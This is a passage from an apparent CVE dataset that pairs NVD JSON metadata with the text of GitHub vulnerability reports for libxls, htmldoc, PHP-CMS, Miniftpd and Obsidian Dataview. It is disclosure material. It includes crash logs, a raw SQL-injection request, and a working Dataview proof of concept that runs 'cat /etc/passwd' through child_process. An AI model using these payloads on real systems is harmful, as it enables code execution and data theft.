"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5D7XXCVFYRRMI4ENXYSD3MZEBS6SMI7E/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SFOE4Z6T46LA47VXWUVET4ELXRZQ3BWB/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Y6XOTFEOCHYKZAFCB6H3KNIIFJ3UFV7V/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libxls_project:libxls:1.6.2:-:*:*:*:*:*:*", "matchCriteriaId": "2E85B8CD-C2ED-4D2E-AAEA-D902317DE6F0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/libxls/libxls/issues/94
[ "Patch", "Third Party Advisory" ]
github.com
[ "libxls", "libxls" ]
# libxls xls_parseWorkSheet() - NULL pointer dereference ## INTRODUCTION A NULL pointer dereference vulnerability has been detected in the function `xls_parseWorkSheet()` when trying to access the `rdi` register that is NULL at that time. Looking at the code we can realize it is because of trying to access `long offset = pWS->filepos;` to that pointer, which is the argument for the function. The argument for `xls_parseWorkSheet()` comes from the return value of `xls_getWorkSheet()`: ```c pWS = xls_getWorkSheet(pWB, i); xls_parseWorkSheet(pWS); ``` If we enter the function `xls_getWorkSheet()`: ```c xlsWorkSheet * xls_getWorkSheet(xlsWorkBook* pWB,int num) { xlsWorkSheet * pWS = NULL; verbose ("xls_getWorkSheet"); if (num >= 0 && num < (int)pWB->sheets.count) { pWS = calloc(1, sizeof(xlsWorkSheet)); pWS->filepos=pWB->sheets.sheet[num].filepos; pWS->workbook=pWB; pWS->rows.lastcol=0; pWS->rows.lastrow=0; pWS->colinfo.count=0; } return pWS; } ``` We can easily deduce that if either `num` is less than 0, or `num` is greater than `pWB->sheets.count` the conditional won't succeed, thus returning `pWS` directly without assigning it a heap chunk. As the pointer has been initialized with NULL, a NULL pointer is returned, which will be the argument for the next function, and the program will crash when trying to access it. ## REPRODUCE To reproduce this crash, the `test2_libxls` file has been used with a specially crafted XLS file. The crafted file needs to have no `BoundSheet8` records to make `pWB->sheets.count` be 0. ``` root@ubuntu:/software/libxls-1.6.2# .libs/test2_libxls min/crash.xls ole2_open: min/crash.xls libxls : xls_open_ole libxls : xls_parseWorkBook ---------------------------------------------- libxls : BOF ID: 3030h Unknown () Size: 16 Not Processed in parseWoorkBook(): BOF=0x3030 size=16 ---------------------------------------------- libxls : BOF ID: 3030h Unknown () Size: 2 Not Processed in parseWoorkBook(): BOF=0x3030 size=2 ---------------------------------------------- libxls : BOF ID: 3030h Unknown () Size: 2 Not Processed in parseWoorkBook(): BOF=0x3030 size=2 ---------------------------------------------- libxls : BOF ID: 3030h Unknown () Size: 0 Not Processed in parseWoorkBook(): BOF=0x3030 size=0 ---------------------------------------------- libxls : BOF ID: 3030h Unknown () Size: 112 Not Processed in parseWoorkBook(): BOF=0x3030 size=112 ---------------------------------------------- libxls : BOF ID: 3030h Unknown () Size: 48 Not Processed in parseWoorkBook(): BOF=0x3030 size=48 ---------------------------------------------- libxls : BOF ID: 3030h Unknown () Size: 48 Not Processed in parseWoorkBook(): BOF=0x3030 size=48 ---------------------------------------------- libxls : BOF ID: 3030h Unknown () Size: 2 Not Processed in parseWoorkBook(): BOF=0x3030 size=2 ---------------------------------------------- libxls : BOF ID: 3030h Unknown () Size: 2 Not Processed in parseWoorkBook(): BOF=0x3030 size=2 ---------------------------------------------- libxls : BOF ID: 3030h Unknown () Size: 48 Not Processed in parseWoorkBook(): BOF=0x3030 size=48 ---------------------------------------------- libxls : BOF ID: 3030h Unknown () Size: 49 Not Processed in parseWoorkBook(): BOF=0x3030 size=49 ---------------------------------------------- libxls : BOF ID: 3030h Unknown () Size: 26880 Not Processed in parseWoorkBook(): BOF=0x3030 size=26880 ---------------------------------------------- libxls : BOF ID: 3030h Unknown () Size: 12336 Not Processed in parseWoorkBook(): BOF=0x3030 size=12336 ---------------------------------------------- libxls : BOF ID: 3030h Unknown () Size: 12336 Not Processed in parseWoorkBook(): BOF=0x3030 size=12336 ---------------------------------------------- libxls : BOF ID: 3030h Unknown () Size: 12336 Not Processed in parseWoorkBook(): BOF=0x3030 size=12336 ---------------------------------------------- libxls : BOF ID: 3030h Unknown () Size: 12336 Not Processed in parseWoorkBook(): BOF=0x3030 size=12336 ---------------------------------------------- libxls : BOF ID: 3030h Unknown () Size: 12336 Not Processed in parseWoorkBook(): BOF=0x3030 size=12336 ---------------------------------------------- libxls : BOF ID: 3030h Unknown () Size: 12336 Not Processed in parseWoorkBook(): BOF=0x3030 size=12336 ---------------------------------------------- libxls : BOF ID: 3030h Unknown () Size: 12336 Not Processed in parseWoorkBook(): BOF=0x3030 size=12336 ---------------------------------------------- libxls : BOF ID: 000Ah EOF (End of File) Size: 48 libxls : xls_getWorkSheet Segmentation fault ``` ## ANALYSIS As I explained in the Introduction section, we need `num` to be less than 0 or greater than `pWB->sheets.count`. Having one (or both) of those requirements can trigger the NULL pointer dereference. In `main()`: ```c for (i = 0; i < pWB->sheets.count; i++) { int isFirstLine = 1; ``` The first condition will never fail as `i` will always be greater or equal to 0. Also, `i` cannot be greater than `pWB->sheets.count` as depends on it's value to be incremented. But... what if `pWB->sheets.count` is equal to 0? Then `i` will be 0 too. In the conditional `i` won't be less than `pWB->sheets.count`, but equal, thus failing the conditional. The function `xls_addSheet()`, responsible for incrementing the `pWB->sheets.count` value is never executed with the current PoC xls file, thus keeping until crash time the value which the program gave it when being initialized at `xls_open_ole()`: ```c pWB->sheets.count=0; pWB->xfs.count=0; pWB->fonts.count=0; pWB->charset = strdup(charset ? charset : "UTF-8"); ``` But how do we make the program to not execute `xls_addSheet()` ? We initially need to avoid any `XLS_RECORD_BOUNDSHEET` record. If we craft an XLS file that do not contain any `BoundSheet8` record, this code will never reached: ```c case XLS_RECORD_BOUNDSHEET: { //printf("ADD SHEET\n"); BOUNDSHEET *bs = (BOUNDSHEET *)buf; xlsConvertBoundsheet(bs); // different for BIFF5 and BIFF8 if ((retval = xls_addSheet(pWB, bs, bof1.size)) != LIBXLS_OK) { goto cleanup; } } break; ``` And `pWB->sheets.count` will be 0 when reaching the conditional code. The result is a SIGSEGV (Segmentation fault) interruption crashing the program trying to access non-mapped memory: ``` ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ──── [#0] Id 1, Name: "test2_libxls", stopped 0x7ffff7fab7cd in xls_parseWorkSheet (), reason: SIGSEGV ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ──── [#0] 0x7ffff7fab7cd → xls_parseWorkSheet(pWS=0x0) [#1] 0x555555555545 → main(argc=<optimized out>, argv=0x7fffffffe378) ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── gef➤ p pWS $9 = (xlsWorkSheet *) 0x0 gef➤ x/i $rip => 0x7ffff7fab7cd <xls_parseWorkSheet+77>: mov rdx,QWORD PTR [rdi+0x18] gef➤ ``` ## IMPACT The most common issue with this type of vulnerability is a Denial of Service (DoS) once a crash has been triggered as demonstrated above with the crash PoC. ## SOLUTION A solution for this issue could be adding a pointer check before using it, and change the actions once a pointer is detected to be NULL. Patch example: ```c xls_error_t xls_parseWorkSheet(xlsWorkSheet* pWS) { BOF tmp; BYTE* buf = NULL; /* --- PATCH START --- */ if(pWS == NULL) return -1; // or any value to be checked from the parent function when failing /* --- PATCH END --- */ long offset = pWS->filepos; size_t read; xls_error_t retval = 0; struct st_cell_data *cell = NULL; xlsWorkBook *pWB = pWS->workbook; verbose ("xls_parseWorkSheet"); if ((retval = xls_preparseWorkSheet(pWS)) != LIBXLS_OK) { goto cleanup; } // printf("size=%d fatpos=%d)\n", pWS->workbook->olestr->size, pWS->workbook->olestr->fatpos); if ((retval = xls_makeTable(pWS)) != LIBXLS_OK) { goto cleanup; } ``` Obviously, the pointer is used multiple times in the code, so having it NULL is something not expected. A more complex patch is needed to avoid unexpected results for the next functions to be executed instead of just returning if a NULL pointer is detected. Anyway, a better solution for this patch is update the conditional at `xls_getWorkSheet()` to this: ```c if (num >= 0 && num <= (int)pWB->sheets.count) { ``` This time, if `num` is equal to `pWB->sheets.count` the heap chunk will be returned avoiding a NULL pointer being returned.
libxls test.c and test2.c - NULL pointer dereference vulnerability due to xls_parseWorkSheet() misuse
https://api.github.com/repos/libxls/libxls/issues/94/comments
3
2021-02-26T19:58:44Z
2021-03-02T19:36:53Z
https://github.com/libxls/libxls/issues/94
817,625,319
94
2,753
CVE-2021-40985
2021-11-03T17:15:08.387
A stack-based buffer under-read in htmldoc before 1.9.12, allows attackers to cause a denial of service via a crafted BMP image to image_load_bmp.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/f12b9666e582a8e7b70f11b28e5ffc49ad625d43" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/444" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/02/msg00022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/f12b9666e582a8e7b70f11b28e5ffc49ad625d43" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/444" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/02/msg00022.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:*:*:*:*:*:*:*:*", "matchCriteriaId": "8D1CE1F4-17A1-430E-9C8B-0CE88A07514B", "versionEndExcluding": "1.9.12", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/michaelrsweet/htmldoc/issues/444
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
os: ubuntu 20.04 htmldoc version: master branch command : ./htmldoc --webpage -f out.pdf ./poc.html [poc.zip](https://github.com/michaelrsweet/htmldoc/files/6915210/poc.zip) asan report ``` ================================================================= ==100970==ERROR: AddressSanitizer: stack-buffer-underflow on address 0x7ffd98c936be at pc 0x000000605f03 bp 0x7ffd98c93690 sp 0x7ffd98c93688 READ of size 1 at 0x7ffd98c936be thread T0 #0 0x605f02 in image_load_bmp(image_t*, _IO_FILE*, int, int) /home/ubuntu/fuzz/htmldocc/htmldoc/image.cxx:1089:12 #1 0x602b94 in image_load /home/ubuntu/fuzz/htmldocc/htmldoc/image.cxx:831:14 #2 0x53bc18 in write_image(_IO_FILE*, render_str*, int) /home/ubuntu/fuzz/htmldocc/htmldoc/ps-pdf.cxx:10305:5 #3 0x5207fa in pdf_write_document(unsigned char*, unsigned char*, unsigned char*, unsigned char*, unsigned char*, unsigned char*, tree_str*, tree_str*) /home/ubuntu/fuzz/htmldocc/htmldoc/ps-pdf.cxx:2292:7 #4 0x50c977 in pspdf_export /home/ubuntu/fuzz/htmldocc/htmldoc/ps-pdf.cxx:910:7 #5 0x4e1663 in main /home/ubuntu/fuzz/htmldocc/htmldoc/htmldoc.cxx:1291:3 #6 0x7ff2c1e7d0b2 in __libc_start_main /build/glibc-YbNSs7/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x41eadd in _start (/home/ubuntu/fuzz/htmldocc/htmldoc/htmldoc+0x41eadd) Address 0x7ffd98c936be is located in stack of thread T0 at offset 30 in frame #0 0x6048ef in image_load_bmp(image_t*, _IO_FILE*, int, int) /home/ubuntu/fuzz/htmldocc/htmldoc/image.cxx:881 This frame has 1 object(s): [32, 1056) 'colormap' (line 894) <== Memory access at offset 30 underflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-underflow /home/ubuntu/fuzz/htmldocc/htmldoc/image.cxx:1089:12 in image_load_bmp(image_t*, _IO_FILE*, int, int) Shadow bytes around the buggy address: 0x10003318a680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10003318a690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10003318a6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10003318a6b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10003318a6c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10003318a6d0: 00 00 00 00 f1 f1 f1[f1]00 00 00 00 00 00 00 00 0x10003318a6e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10003318a6f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10003318a700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10003318a710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10003318a720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==100970==ABORTING ```
stack-buffer-underflow in htmldoc
https://api.github.com/repos/michaelrsweet/htmldoc/issues/444/comments
2
2021-08-02T07:44:48Z
2021-11-08T01:45:06Z
https://github.com/michaelrsweet/htmldoc/issues/444
957,859,917
444
2,754
CVE-2020-18263
2021-11-03T18:15:07.953
PHP-CMS v1.0 was discovered to contain a SQL injection vulnerability in the component search.php via the search parameter. This vulnerability allows attackers to access sensitive database information.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/harshitbansal373/PHP-CMS/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/harshitbansal373/PHP-CMS/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:php-cms_project:php-cms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA113E26-6E50-41D9-8696-9674DDCC34F5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/harshitbansal373/PHP-CMS/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "harshitbansal373", "PHP-CMS" ]
In search.php,there's a SQL injection vulnerability in parameter,search.This parameter is transmitted using POST,you can use sqlmap to enter the database. ``` POST /search.php HTTP/1.1 Host: localhost:8082 Connection: keep-alive Content-Length: 18 Cache-Control: max-age=0 Origin: http://localhost:8082 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Referer: http://localhost:8082/index.php Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: PHPSESSID=h0vvq91s3j8aq77qsjmdbbt8vq search=111&submit= ``` [![20190614-sqlia1.png](https://i.loli.net/2019/06/14/5d03689aec07666393.png)](https://i.loli.net/2019/06/14/5d03689aec07666393.png) [![20190614-sqlia2.png](https://i.loli.net/2019/06/14/5d03689ac9d8e12257.png)](https://i.loli.net/2019/06/14/5d03689ac9d8e12257.png) [![20190614-sqlia3.png](https://i.loli.net/2019/06/14/5d03689ab659a44855.png)](https://i.loli.net/2019/06/14/5d03689ab659a44855.png)
SQL injection vulnerability in search.php
https://api.github.com/repos/harshitbansal373/PHP-CMS/issues/1/comments
0
2019-06-14T09:29:32Z
2019-06-14T09:29:32Z
https://github.com/harshitbansal373/PHP-CMS/issues/1
456,150,677
1
2,755
CVE-2021-42624
2021-11-04T11:15:07.640
A local buffer overflow vulnerability exists in the latest version of Miniftpd in ftpproto.c through the tmp variable, where a crafted payload can be sent to the affected function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Gabe-commiter/Miniftpd/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Gabe-commiter/Miniftpd/issues/4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:miniftpd_project:miniftpd:-:*:*:*:*:*:*:*", "matchCriteriaId": "A4D33EF1-0E4E-4005-B938-D75E8BAA31F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/Gabe-commiter/Miniftpd/issues/4
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Gabe-commiter", "Miniftpd" ]
Hi @Gabe-commiter, I found a issue, that can trigger buffer overflow on your application. The issue exists on list_common() function (from line 437 to 484) on ftpproto.c By reading line by line, we can see you using sprintf() in your application. The problem appears when you defined buf and tmp variables both have 1024 length. Along with off's size = len(sprint()) so anytime you is using off += sprintf(), offset will be increased. Finally you get input from tmp to buf is trigger bufferoverflow. ``` void list_common(session_t *sess) { DIR *dir = opendir("."); if (dir == NULL) { return; } struct dirent *dt; struct stat sbuf; while ((dt = readdir(dir)) != NULL) { if (lstat(dt->d_name, &sbuf) < 0) { continue; } if (dt->d_name[0] == '.') { continue; } char buf[1024] = {0}; //Defined buf's size is 1024 const char *perms = statbuf_get_perms(&sbuf); int off = 0; off += sprintf(buf, "%s ", perms); // Define off size off += sprintf(buf + off, " %3d %-8d %-8d ", (int)sbuf.st_nlink, sbuf.st_uid, sbuf.st_gid);// Define next write position to avoid overwriting off += sprintf(buf + off, "%8lu ", (unsigned long)sbuf.st_size); const char *datebuf = statbuf_get_date(&sbuf); off += sprintf(buf + off, "%s ", datebuf); if (S_ISLNK(sbuf.st_mode)) { char tmp[1024] = {0}; // Defined tmp's size is 1024 readlink(dt->d_name, tmp, sizeof(tmp)); //Get tmp with sizeof(tmp), max is 1024 from path in dt->d_name off += sprintf(buf + off, "%s -> %s\r\n", dt->d_name, tmp); // Read tmp to buf with max size is 1024, and buf max size is also 1024 so trigger bufferoverflow } else { off += sprintf(buf + off, "%s\r\n", dt->d_name); } writen(sess->data_fd, buf, strlen(buf)); } closedir(dir); } ``` Exploit: sprintf() on line 473 read tmp and dt->name data in format defined before. But with data already written in from previous code, we can only write 1024 - off bytes. In case tmp have maximum size, input read into buf += 1024 + "\n\r" + leng(dt->name). It will trigger bufferoverflow. Solution : Please limit maximum input characters in snprintf(). Defined buff's maximum size is equal to the sum of the variables's size concatenated with the snprintf().
sprintf() trigger buffer overflow on list_common() function
https://api.github.com/repos/Gabe-commiter/Miniftpd/issues/4/comments
0
2021-10-13T12:01:47Z
2021-10-13T12:02:45Z
https://github.com/Gabe-commiter/Miniftpd/issues/4
1,025,158,824
4
2,756
CVE-2021-42057
2021-11-04T21:15:09.080
Obsidian Dataview through 0.4.12-hotfix1 allows eval injection. The evalInContext function in executes user input, which allows an attacker to craft malicious Markdown files that will execute arbitrary code once opened. NOTE: 0.4.13 provides a mitigation for some use cases.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/blacksmithgu/obsidian-dataview/issues/615" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/blacksmithgu/obsidian-dataview/issues/615" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:obsidian:obsidian_dataview:*:*:*:*:*:*:*:*", "matchCriteriaId": "9CB8353D-A92C-4981-841F-1875BE26031F", "versionEndExcluding": null, "versionEndIncluding": "0.4.11", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:obsidian:obsidian_dataview:0.4.12:-:*:*:*:*:*:*", "matchCriteriaId": "E3FF429D-09CE-4219-8650-480BB404CA7A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:obsidian:obsidian_dataview:0.4.12:hotfix1:*:*:*:*:*:*", "matchCriteriaId": "638D9E3E-A139-47BD-B3EF-D49865819FC0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/blacksmithgu/obsidian-dataview/issues/615
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "blacksmithgu", "obsidian-dataview" ]
## Describe the bug I discovered a way to craft malicious markdown files that will cause the obsidian-dataview plugin to execute arbitrary commands on users’ systems. This is due to the unsafe use of eval within the [evalInContext](https://github.com/blacksmithgu/obsidian-dataview/blob/f897a178a678c2fa625de018c6722488e237a5b4/src/api/inline-api.ts#L306) function located in src/api/inline-api.ts. This has been assigned a CVE of [CVE-2021-42057](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42057) for tracking. ## To Reproduce The following proof-of-concept can be used to display a file on a user’s system by executing the `cat` command: ```` ```dataviewjs require("child_process").exec("cat /etc/passwd",(_0,stdout,_1) => dv.span(stdout));"" ``` ```` A malicious user could leverage this vulnerability to execute arbitrary code on other users' systems by getting them to open an untrusted markdown file. This is especially dangerous in environments where users share vaults. ## Expected behavior DataviewJS should not make an unsafe call to eval using user supplied input. ## Additional Context Shortly after we privately disclosed this issue, @blacksmithgu promptly changed the default behavior of Dataview to no longer enable JavaScript Queries by default (see release [0.4.13](https://github.com/blacksmithgu/obsidian-dataview/releases/tag/0.4.13)). This helps protect new dataview users and provides a way for existing dataview users to mitigate this issue by disabling the JavaScript Query functionality when opening untrusted markdown. @blacksmithgu is currently working on additional solutions and provided permission for us to open a public issue here for tracking.
Arbitrary Code Execution via JavaScript Queries (CVE-2021-42057)
https://api.github.com/repos/blacksmithgu/obsidian-dataview/issues/615/comments
17
2021-11-04T19:08:34Z
2022-09-30T23:17:56Z
https://github.com/blacksmithgu/obsidian-dataview/issues/615
1,045,109,271
615
2,757
CVE-2021-43398
2021-11-04T21:15:09.520
